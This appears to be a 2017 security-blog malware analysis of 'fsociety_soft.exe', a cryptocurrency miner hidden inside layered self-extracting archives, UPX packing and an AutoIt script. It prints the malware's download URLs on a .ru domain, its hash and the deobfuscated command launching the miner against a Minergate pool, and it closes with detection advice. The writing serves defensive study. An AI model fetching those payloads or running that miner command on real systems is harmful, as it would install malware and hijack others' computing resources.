Ring Ø Labs DOES NOT advocate using any of the malware, techniques, or information presented here for harm and doing so may violate the law. These topics are for mitigation and educational purposes only. Read more about us here

Sunday, July 30, 2017

To Kill The Mocking Porn - Fsociety Crypto Miner


Fsociety is a crypto miner that hides behind multiple layers of obfuscation, Russian porn sites, and trickery. Enjoy the ride :)






WARNING:
USE OF INFORMATION IN THIS REPORT FOR ANY ACTION AGAINST A MACHINE WITHOUT THE OWNERS CONSENT MAY VIOLATE THE LAW.

DETAILS


Filename
fsociety_soft.exe
Protection
Self-Extracting Rar / UPX / Autoit3
MD5
dfafd55bc9a0e84eafada04a5f21aead
Sample
Type
Crypto Miner
Video



INTRODUCTION


Fsociety_soft.exe is either paying homage to Fsociety from the TV show Mr. Robot, or posing as some kind of legitimate fanboy application; regardless, the application is certainly dangerous.


ANALYSIS


We begin by extracting the main executable which is a self-extracting RAR archive. The file extracted is named WINDOWS.exe and is itself another self-extracting RAR archive (RAR-ception).

The file extracted from the 2nd archive is also named WINDOWS.exe and is UPX packed. A quick unpacking of this file reveals the final launcher and it's embedded AUTOIT3 script.



Once running, WINDOWS.exe connects to iplogger.com. If a connection is unable to be made the program will exit. This is most likely an anti-analysis trick which is easily bypassed by setting up rules to pass traffic to the domain or simply respond with what the malware is looking for from the site.
Once connectivity is confirmed, WINDOWS.exe will connect to the following .RU domain and download additional files:

http://porntovirt.ru/075/Security.exe
http://porntovirt.ru/075/system.exe
http://porntovirt.ru/075/1.bat


At the time of this analysis the only file hosted on the domain was 1.bat. The other files were non-existent.



Performing a directory traversal back to the main page we are greeted with the following (blurred for article):


Clicking the button at the bottom of the page we are then greeted with the following (blurred for article):





Again, clicking the button brings us to the final location which is a redirection to a Google drive file that no longer exists. This could be remnants of a past attack hosting a malicious file.





Porn site detour aside, 1.bat is a highly obfuscated batch file which is responsible for launching the crypto mining software.



Deobfuscating this VERY long script essentially boils down to the following command:

C:\ProgramData\System32\system.exe -o stratum+tcp://xmr.pool.minergate.com:45560 --donate-level=1 -u lemoh4uk.sagmail.com -p x -t 2 -k

This will launch two instances of the mining software (it repeats the command) and connects to the MINERGATE bitcoin mining pool. We can see in red the USERID of the individual where the mined bitcoin will be distributed lemoh4uk.sagmail.com.

When running at full capacity, the two mining programs will take up significant system resources as indicated by this graph immediately after infection:



DETECTION



There are many VirusTotal results for the later stages of this file (after the archive is extracted and payload is unpacked from UPX). The best mitigation for the early stages of this malware is to disallow self-extracting RAR files and quarantine anything UPX packed. There's no reason to have it in a business environment.

CONCLUSION


Fsociety is a crypto miner that hides behind multiple layers of obfuscation, porn sites, and trickery. The initial stages of obfuscation should be blocked by most businesses and be sure to check AlienVaults IOC's for additional blocking.